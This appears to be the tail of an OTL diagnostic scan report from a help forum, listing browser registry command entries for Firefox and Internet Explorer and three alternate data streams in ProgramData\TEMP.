HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\Windows\System32\ie4uinit.exe" -show [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\Windows\System32\ie4uinit.exe" -reinstall [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\Windows\System32\ie4uinit.exe" -hide [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" -extoff [2014/02/06 23:24:01 | 000,808,152 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2014/02/06 23:24:01 | 000,808,152 | ---- | M] (Microsoft Corporation)

[color=#A23BEC]< hklm\software\clients\startmenuinternet|command /64 /rs >[/color]
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\Windows\System32\ie4uinit.exe" -show [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\Windows\System32\ie4uinit.exe" -reinstall [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\Windows\System32\ie4uinit.exe" -hide [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" -extoff [2014/02/06 23:24:01 | 000,808,152 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2014/02/06 23:24:01 | 000,808,152 | ---- | M] (Microsoft Corporation)

[color=#E56717]========== Alternate Data Streams ==========[/color]
@Alternate Data Stream - 128 bytes -> C:\ProgramData\TEMP:D346F792
@Alternate Data Stream - 118 bytes -> C:\ProgramData\TEMP:373E1720
@Alternate Data Stream - 116 bytes -> C:\ProgramData\TEMP:3DA1C741

< End of report >